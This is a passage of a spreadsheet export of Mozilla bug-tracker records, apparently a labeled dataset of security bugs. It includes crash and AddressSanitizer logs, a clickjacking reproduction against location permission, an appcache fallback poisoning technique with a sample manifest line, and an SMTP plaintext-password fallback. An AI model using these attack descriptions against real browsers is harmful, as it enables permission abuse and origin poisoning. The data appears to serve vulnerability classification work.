    #13 0x7ff7897e14d4 in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:131
    #14 0x7ff7898de217 in __scrt_common_main_seh d:\agent\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #15 0x7ffe61627033 in BaseThreadInitThunk+0x13 (C:\Windows\System32\KERNEL32.DLL+0x180017033)
    #16 0x7ffe63602650 in RtlUserThreadStart+0x20 (C:\Windows\SYSTEM32\ntdll.dll+0x180052650)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:619 in PLDHashTable::MakeEntryHandle
Shadow bytes around the buggy address:
  0x04bc6de98150: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa
  0x04bc6de98160: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
  0x04bc6de98170: fa fa 00 00 00 00 00 04 fa fa 00 00 00 00 00 00
  0x04bc6de98180: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
  0x04bc6de98190: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
=&gt;0x04bc6de981a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd[fd]fd
  0x04bc6de981b0: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
  0x04bc6de981c0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x04bc6de981d0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x04bc6de981e0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x04bc6de981f0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00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3780==ABORTING</t>
        </is>
      </c>
      <c r="X2293" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" t="n">
        <v>1181204</v>
      </c>
      <c r="B2294" t="inlineStr">
        <is>
          <t>2015-07-07 10:03:53 -0700</t>
        </is>
      </c>
      <c r="C2294" t="inlineStr">
        <is>
          <t>heap-use-after-free in mozilla::MediaFormatReader::VideoIsHardwareAccelerated()</t>
        </is>
      </c>
      <c r="D2294" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:39 -0700</t>
        </is>
      </c>
      <c r="E2294" t="n">
        <v>1</v>
      </c>
      <c r="F2294" t="n">
        <v>1</v>
      </c>
      <c r="G2294" t="n">
        <v>3</v>
      </c>
      <c r="H2294" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2294" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2294" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K2294" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2294" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2294" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2294" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2294" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+]</t>
        </is>
      </c>
      <c r="Q2294" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2294" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2294" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T2294" t="n">
        <v>1</v>
      </c>
      <c r="U2294" t="n">
        <v>0</v>
      </c>
      <c r="V2294" t="n">
        <v>20</v>
      </c>
      <c r="W2294" t="inlineStr">
        <is>
          <t>Created attachment 8630547
asan_log.txt
I have seen this issue a few times now and I can reproduce it with my fuzzer in about an hour. I'll keep trying to get a reliable test case.
==33111==ERROR: AddressSanitizer: heap-use-after-free on address 0x6040000c31d0 at pc 0x7f1a7c91223c bp 0x7f1a3b694330 sp 0x7f1a3b694328
READ of size 8 at 0x6040000c31d0 thread T66 (MediaPl~back #4)</t>
        </is>
      </c>
      <c r="X2294" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" t="n">
        <v>1826116</v>
      </c>
      <c r="B2295" t="inlineStr">
        <is>
          <t>2023-04-03 07:37:58 -0700</t>
        </is>
      </c>
      <c r="C2295" t="inlineStr">
        <is>
          <t>Clickjacking to allowed location permission (bypassing button-enable delay)</t>
        </is>
      </c>
      <c r="D2295" t="inlineStr">
        <is>
          <t>2024-06-02 18:06:40 -0700</t>
        </is>
      </c>
      <c r="E2295" t="n">
        <v>1</v>
      </c>
      <c r="F2295" t="n">
        <v>1</v>
      </c>
      <c r="G2295" t="n">
        <v>2</v>
      </c>
      <c r="H2295" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2295" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2295" t="inlineStr">
        <is>
          <t>Site Permissions</t>
        </is>
      </c>
      <c r="K2295" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2295" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2295" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2295" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2295" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2295" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main113+][adv-ESR102.11+]</t>
        </is>
      </c>
      <c r="Q2295" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2295" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2295" t="inlineStr">
        <is>
          <t>114 Branch</t>
        </is>
      </c>
      <c r="T2295" t="n">
        <v>1</v>
      </c>
      <c r="U2295" t="n">
        <v>0</v>
      </c>
      <c r="V2295" t="n">
        <v>46</v>
      </c>
      <c r="W2295" t="inlineStr">
        <is>
          <t>Created attachment 9326638
bandicam 2023-04-03 21-21-19-749.mp4
i found a vulnerability where user can fall for clickjacking to allow location permission
I tested on Firefox version 111.0.1 (64-bit)
steps  to reproduce:
1. open https://pipabajabakrie.com/upload/geofullscreen6.html
2. Click the "try it" button. then it will appear in fullscreen mode
3. Quickly click the "try it" button 3 times without moving the mouse then the location permission will be allowed
I am attaching 2 videos. one video on firefox and another on chrome where in chrome the mouse click doesn't work in notification permission with same steps to reproduces</t>
        </is>
      </c>
      <c r="X2295" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" t="n">
        <v>1149891</v>
      </c>
      <c r="B2296" t="inlineStr">
        <is>
          <t>2015-03-31 23:06:52 -0700</t>
        </is>
      </c>
      <c r="C2296" t="inlineStr">
        <is>
          <t>crash in CSPService::ShouldLoad(unsigned int, nsIURI*, nsIURI*, nsISupports*, nsACString_internal const&amp;, nsISupports*, nsIPrincipal*, short*) from userscript</t>
        </is>
      </c>
      <c r="D2296" t="inlineStr">
        <is>
          <t>2016-07-02 10:45:03 -0700</t>
        </is>
      </c>
      <c r="E2296" t="n">
        <v>1</v>
      </c>
      <c r="F2296" t="n">
        <v>1</v>
      </c>
      <c r="G2296" t="n">
        <v>3</v>
      </c>
      <c r="H2296" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2296" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2296" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K2296" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L2296" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2296" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2296" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2296" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2296" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q2296" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2296" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2296" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T2296" t="n">
        <v>1</v>
      </c>
      <c r="U2296" t="n">
        <v>0</v>
      </c>
      <c r="V2296" t="n">
        <v>58</v>
      </c>
      <c r="W2296" t="inlineStr">
        <is>
          <t>Created attachment 8586584
Crash.Default.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Build ID: 20150122214805
Steps to reproduce:
Test profile attached.
Install profile.
On bookmark toolbar there is one saved bookmark "firefox crash". Click bookmark.
Actual results:
Firefox will crash as page is loading. If page finishes loading then click bookmark again. Crash usually happens by 3rd try.
Expected results:
Firefox should not crash. Previous versions of firefox do not crash.</t>
        </is>
      </c>
      <c r="X2296" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2297">
      <c r="A2297" t="n">
        <v>705347</v>
      </c>
      <c r="B2297" t="inlineStr">
        <is>
          <t>2011-11-25 11:37:46 -0800</t>
        </is>
      </c>
      <c r="C2297" t="inlineStr">
        <is>
          <t>Crash [@ nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr&lt;imgIDecoderObserver&gt;]</t>
        </is>
      </c>
      <c r="D2297" t="inlineStr">
        <is>
          <t>2015-10-16 11:50:21 -0700</t>
        </is>
      </c>
      <c r="E2297" t="n">
        <v>1</v>
      </c>
      <c r="F2297" t="n">
        <v>1</v>
      </c>
      <c r="G2297" t="n">
        <v>3</v>
      </c>
      <c r="H2297" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2297" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2297" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K2297" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L2297" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2297" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2297" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2297" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P2297" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by bug 432391</t>
        </is>
      </c>
      <c r="Q2297" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2297" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2297" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T2297" t="n">
        <v>1</v>
      </c>
      <c r="U2297" t="n">
        <v>0</v>
      </c>
      <c r="V2297" t="n">
        <v>21</v>
      </c>
      <c r="W2297" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #587720 +++
1. http://nizhnegorsk.at.ua/index/veb_kamery_nizhnegorska/0-13
2. Crash ?
Beta/9 Windows XP/7 ( I couldn't reproduce this locally)
Operating system: Windows NT
                  5.1.2600 Service Pack 3
CPU: x86
     GenuineIntel family 6 model 44 stepping 2
     1 CPU
Crash reason:  EXCEPTION_ACCESS_VIOLATION_READ
Crash address: 0xffffffffdddddde1
Thread 0 (crashed)
 0  xul.dll!nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr&lt;imgIDecoderObserver&gt;(imgIDecoderObserver *) [nsCOMPtr.h : 600 + 0xd]
    eip = 0x01819694   esp = 0x0012d228   ebp = 0x0012d230   ebx = 0x00000001
    esi = 0x00902848   edi = 0x00000000   eax = 0x06db8e10   ecx = 0xdddddddd
    edx = 0x0012d260   efl = 0x00210202
    Found by: given as instruction pointer in context
 1  xul.dll!imgRequestProxy::OnStopRequest(int) [imgRequestProxy.cpp : 737 + 0x11]
    eip = 0x01818f0a   esp = 0x0012d238   ebp = 0x0012d2c4
    Found by: call frame info
 2  xul.dll!imgStatusTracker::EmulateRequestFinished(imgRequestProxy *,unsigned int,int) [imgStatusTracker.cpp : 291 + 0x9]
    eip = 0x0181b633   esp = 0x0012d2cc   ebp = 0x0012d2d8
    Found by: call frame info
 3  xul.dll!imgRequest::RemoveProxy(imgRequestProxy *,unsigned int,int) [imgRequest.cpp : 320 + 0x19]
    eip = 0x01812891   esp = 0x0012d2e0   ebp = 0x0012d410
    Found by: call frame info
 4  xul.dll!imgRequestProxy::DoCancel(unsigned int) [imgRequestProxy.cpp : 294 + 0x1b]
    eip = 0x01817e82   esp = 0x0012d418   ebp = 0x0012d428
    Found by: call frame info
 5  xul.dll!imgRequestProxy::imgCancelRunnable::Run() [imgRequestProxy.h : 157 + 0x18]
    eip = 0x01817dec   esp = 0x0012d430   ebp = 0x0012d434
    Found by: call frame info
Beta/9 Mac OS X
1. http://nizhnegorsk.at.ua/index/veb_kamery_nizhnegorska/0-13
2. Shutdown
3. Crash. I can reproduce this locally on Mac OS X.
Operating system: Mac OS X
                  10.6.8 10K549
CPU: amd64
     family 6 model 23 stepping 10
     2 CPUs
Crash reason:  EXC_BAD_ACCESS / 0x0000000d
Crash address: 0x0
Thread 0 (crashed)
 0  XUL!nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr [nsCOMPtr.h : 600 + 0xe]
    rbx = 0x0000000118a29b28   r12 = 0x0000000102a268c8
    r13 = 0x0000000100119150   r14 = 0x0000000100118c30
    r15 = 0x0000000000000000   rip = 0x00000001015471c3
    rsp = 0x00007fff5fbf9400   rbp = 0x00007fff5fbf9410
    Found by: given as instruction pointer in context
 1  XUL!imgRequestProxy::OnStopRequest [imgRequestProxy.cpp : 737 + 0x16]
    rbx = 0x0000000118a29b28   r12 = 0x0000000102a268c8
    r13 = 0x0000000100119150   r14 = 0x0000000100118c30
    r15 = 0x0000000000000000   rip = 0x00000001015446af
    rsp = 0x00007fff5fbf9420   rbp = 0x00007fff5fbf9500
    Found by: call frame info
 2  XUL!imgStatusTracker::EmulateRequestFinished [imgStatusTracker.cpp : 291 + 0xd]
    rbx = 0x0000000118a36280   r12 = 0x0000000102a268c8
    r13 = 0x0000000100119150   r14 = 0x0000000100118c30
    r15 = 0x0000000000000000   rip = 0x000000010154935c
    rsp = 0x00007fff5fbf9510   rbp = 0x00007fff5fbf9540
    Found by: call frame info
 3  XUL!imgRequest::RemoveProxy [imgRequest.cpp : 320 + 0x25]
    rbx = 0x0000000118a36280   r12 = 0x0000000102a268c8
    r13 = 0x0000000100119150   r14 = 0x0000000100118c30
    r15 = 0x0000000000000000   rip = 0x000000010153f1bb
    rsp = 0x00007fff5fbf9550   rbp = 0x00007fff5fbf96d0
    Found by: call frame info
running under gdb with scribble malloc enabled I get
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x55555559
0x05339067 in nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr (this=0xbfffcc08, aRawPtr=0x2888f240) at nsCOMPtr.h:600
600	            NSCAP_ADDREF(this, mRawPtr);
(gdb) bt
#0  0x05339067 in nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr (this=0xbfffcc08, aRawPtr=0x2888f240) at nsCOMPtr.h:600
#1  0x05336732 in imgRequestProxy::OnStopRequest (this=0x2888f1a0, lastPart=0) at /work/mozilla/builds/beta/mozilla/modules/libpr0n/src/imgRequestProxy.cpp:737
#2  0x0533aab1 in imgStatusTracker::SendStopRequest (this=0x2557d8f0, aProxy=0x2888f1a0, aLastPart=0, aStatus=0) at /work/mozilla/builds/beta/mozilla/modules/libpr0n/src/imgStatusTracker.cpp:522
#3  0x053309ec in imgRequest::OnStopRequest (this=0x255149b0, aRequest=0x28783380, ctxt=0x0, status=0) at /work/mozilla/builds/beta/mozilla/modules/libpr0n/src/imgRequest.cpp:948
#4  0x05154b67 in nsPartChannel::SendOnStopRequest (this=0x28783380, aContext=0x0, aStatus=0) at /work/mozilla/builds/beta/mozilla/netwerk/streamconv/converters/nsMultiMixedConv.cpp:120
#5  0x05154bd9 in nsMultiMixedConv::SendStop (this=0x287b78a0, aStatus=0) at /work/mozilla/builds/beta/mozilla/netwerk/streamconv/converters/nsMultiMixedConv.cpp:857
(gdb) info registers
eax            0x55555559	1431655769
ecx            0x0	0
edx            0xbfffcc08	-1073755128
ebx            0x5336644	87254596
esp            0xbfffcb70	0xbfffcb70
ebp            0xbfffcb88	0xbfffcb88
esi            0x288b09f8	680200696
edi            0x5320cf8	87166200
eip            0x5339067	0x5339067 &lt;nsCOMPtr&lt;imgIDecoderObserver&gt;::nsCOMPtr(imgIDecoderObserver*)+33&gt;
eflags         0x210206	2163206
cs             0x17	23
ss             0x1f	31
ds             0x1f	31
es             0x1f	31
fs             0x0	0
gs             0x37	55
I can reproduce on Mac with a saved version. Reducing now.</t>
        </is>
      </c>
      <c r="X2297" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2298">
      <c r="A2298" t="n">
        <v>311657</v>
      </c>
      <c r="B2298" t="inlineStr">
        <is>
          <t>2005-10-08 05:54:58 -0700</t>
        </is>
      </c>
      <c r="C2298" t="inlineStr">
        <is>
          <t>Don't fall back to insecure authentication after SMTP auth failure</t>
        </is>
      </c>
      <c r="D2298" t="inlineStr">
        <is>
          <t>2010-09-17 18:16:03 -0700</t>
        </is>
      </c>
      <c r="E2298" t="n">
        <v>1</v>
      </c>
      <c r="F2298" t="n">
        <v>1</v>
      </c>
      <c r="G2298" t="n">
        <v>3</v>
      </c>
      <c r="H2298" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2298" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J2298" t="inlineStr">
        <is>
          <t>Networking: SMTP</t>
        </is>
      </c>
      <c r="K2298" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2298" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2298" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2298" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2298" t="inlineStr"/>
      <c r="Q2298" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2298" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2298" t="inlineStr">
        <is>
          <t>mozilla1.9alpha7</t>
        </is>
      </c>
      <c r="T2298" t="n">
        <v>1</v>
      </c>
      <c r="U2298" t="n">
        <v>1</v>
      </c>
      <c r="V2298" t="n">
        <v>78</v>
      </c>
      <c r="W2298" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Build Identifier: Thunderbird 1.0.6
In short: Basically the same as Bug 225809, only for SMTP.
If secure (e.g. CRAM-MD5) authentication is advertised by the server, mozilla
tries to authenticate using CRAM-MD5, and if it fails it falls back to the
insecure LOGIN or PLAIN methods, sending the plaintext password.
This can happen, for example, if the server is having problems, or if the user
mistypes the password or due to a man-in-the-middle-attack. In all these cases
retrying with plaintext authentication will not help and using it defeats the
purpose of secure authentication, which is to avoid sending the password over
the wire.
Solution 1: Add a user preference "Never send unencrypted passwords", which
completely disables LOGIN and PLAIN authentication for non-SSL connections.
Solution 2: Add a user preference of authentication to be used, which defaults
to Auto (try all auth methods supported by the server). [Probably too technical
for most users]
Reproducible: Always
Steps to Reproduce:
Provoke CRAM-MD5 authentication failure by mistyping password.
Actual Results:  
Password is transmitted unencrypted using PLAIN or LOGIN.
Expected Results:  
Password should not be transmitted unencrypted (subject to user preference).</t>
        </is>
      </c>
      <c r="X2298" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2299">
      <c r="A2299" t="n">
        <v>1354632</v>
      </c>
      <c r="B2299" t="inlineStr">
        <is>
          <t>2017-04-07 11:33:09 -0700</t>
        </is>
      </c>
      <c r="C2299" t="inlineStr">
        <is>
          <t>Grouping by channel and distribution_id on churn does not return the same results</t>
        </is>
      </c>
      <c r="D2299" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E2299" t="n">
        <v>1</v>
      </c>
      <c r="F2299" t="n">
        <v>1</v>
      </c>
      <c r="G2299" t="n">
        <v>2</v>
      </c>
      <c r="H2299" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2299" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J2299" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2299" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2299" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2299" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2299" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2299" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2299" t="inlineStr"/>
      <c r="Q2299" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2299" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2299" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2299" t="n">
        <v>1</v>
      </c>
      <c r="U2299" t="n">
        <v>0</v>
      </c>
      <c r="V2299" t="n">
        <v>4</v>
      </c>
      <c r="W2299" t="inlineStr">
        <is>
          <t>The churn dataset reports different numbers for distribution_id and channel. Channel is the concatenation of channel and distribution_id if the distribution_id is a funnelcake. 
I would expect the number of profiles grouped by distribution_id to be strictly equal to or greater than the equivalent channel. This is not the case. It seems that roughly 20% of the distribution_id's go into the void, but somehow make it into the channel [1].
This should not be the case. In addition, null values should not appear in the distribution_id field.
[1] https://sql.telemetry.mozilla.org/queries/4013/source#table</t>
        </is>
      </c>
      <c r="X2299" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2300">
      <c r="A2300" t="n">
        <v>1586630</v>
      </c>
      <c r="B2300" t="inlineStr">
        <is>
          <t>2019-10-06 18:03:20 -0700</t>
        </is>
      </c>
      <c r="C2300" t="inlineStr">
        <is>
          <t>Appcache fallback can be corrupted allowing manifests to poison an entire origin</t>
        </is>
      </c>
      <c r="D2300" t="inlineStr">
        <is>
          <t>2020-12-18 17:01:19 -0800</t>
        </is>
      </c>
      <c r="E2300" t="n">
        <v>1</v>
      </c>
      <c r="F2300" t="n">
        <v>1</v>
      </c>
      <c r="G2300" t="n">
        <v>3</v>
      </c>
      <c r="H2300" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2300" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2300" t="inlineStr">
        <is>
          <t>Networking: Cache</t>
        </is>
      </c>
      <c r="K2300" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2300" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2300" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2300" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2300" t="inlineStr">
        <is>
          <t>[necko-triaged][post-critsmash-triage][sec-survey][adv-main78+]</t>
        </is>
      </c>
      <c r="Q2300" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2300" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2300" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T2300" t="n">
        <v>1</v>
      </c>
      <c r="U2300" t="n">
        <v>0</v>
      </c>
      <c r="V2300" t="n">
        <v>23</v>
      </c>
      <c r="W2300" t="inlineStr">
        <is>
          <t>There is an issue in our appcache implementation that allows a manifest served from a subdirectory, to confuse the browser into using the appcache to requests to the top level directory. (i.e. we dont enforced the rule that appcache is only supposed to be able to be responsible for requests to sub-directories. 
This bug was confirmed by Honza. From email: 
&gt;I quickly confirmed on **IIS 10** with statically served content: when the &lt;html manifest&gt; attribute value is in a form of "/dir%2fsubdir%2fcache.manifest" and the manifest, served at `/dir/subdir/cache.manifest`, has `FALLBACK: / some-evil-resource-url`, we load the evil resource for anything that can't be found on the web site for the origin the document was loaded in.
An example of a real world attack scenario (which I'm not linking, so as not to draw attention) is given in https://bugzilla.mozilla.org/show_bug.cgi?id=1376459#c4. 
While appcache is close to deprecation, as we have had external reports here of this issue, I'm filing this bug to consider if a fix is need in the short term, or if we can just push for appcache deprecation (1237782 ). The consensus from the discussion so far is that deprecation will _not_ make ESR68, so we make need an interim fix.</t>
        </is>
      </c>
      <c r="X2300" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2301">
      <c r="A2301" t="n">
        <v>879656</v>
      </c>
      <c r="B2301" t="inlineStr">
        <is>
          <t>2013-06-04 23:09:44 -0700</t>
        </is>
      </c>
      <c r="C2301" t="inlineStr">
        <is>
          <t>Texture in Inspector's 3D View showing parts of the OS and other applications</t>
        </is>
      </c>
      <c r="D2301" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:37 -0800</t>
        </is>
      </c>
      <c r="E2301" t="n">
        <v>1</v>
      </c>
      <c r="F2301" t="n">
        <v>1</v>
      </c>
      <c r="G2301" t="n">
        <v>3</v>
      </c>
      <c r="H2301" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2301" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2301" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2301" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2301" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2301" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2301" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2301" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2301" t="inlineStr">
        <is>
          <t>[adv-main24+]</t>
        </is>
      </c>
      <c r="Q2301" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2301" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2301" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2301" t="n">
        <v>1</v>
      </c>
      <c r="U2301" t="n">
        <v>0</v>
      </c>
      <c r="V2301" t="n">
        <v>73</v>
      </c>
      <c r="W2301" t="inlineStr">
        <is>
          <t>Created attachment 758407
screenshot
STR:
1. Go to http://creativityblueprints.ro/#/home
2. Open Inspector
3. Select the HTML node
4. Open Tilt (click on the little cube on the right)
Results: The webpage mesh has a texture applied that contains parts of the desktop, my dock and the markup panel. In other scenarios, the texture only contains large of black and white.
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20130603 Firefox/24.0 (today's Nightly)</t>
        </is>
      </c>
      <c r="X2301" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2302">
      <c r="A2302" t="n">
        <v>1619677</v>
      </c>
      <c r="B2302" t="inlineStr">
        <is>
          <t>2020-03-03 09:00:14 -0800</t>
        </is>
      </c>
      <c r="C2302" t="inlineStr">
        <is>
          <t>Can't scroll the bottom pane in Treeherder</t>
        </is>
      </c>
      <c r="D2302" t="inlineStr">
        <is>
          <t>2020-03-17 15:10:36 -0700</t>
        </is>
      </c>
      <c r="E2302" t="n">
        <v>1</v>
      </c>
      <c r="F2302" t="n">
        <v>1</v>
      </c>
      <c r="G2302" t="n">
        <v>7</v>
      </c>
      <c r="H2302" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2302" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2302" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K2302" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2302" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2302" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2302" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2302" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2302" t="inlineStr"/>
      <c r="Q2302" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2302" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2302" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2302" t="n">
        <v>1</v>
      </c>
      <c r="U2302" t="n">
        <v>0</v>
      </c>
      <c r="V2302" t="n">
        <v>6</v>
      </c>
      <c r="W2302" t="inlineStr">
        <is>
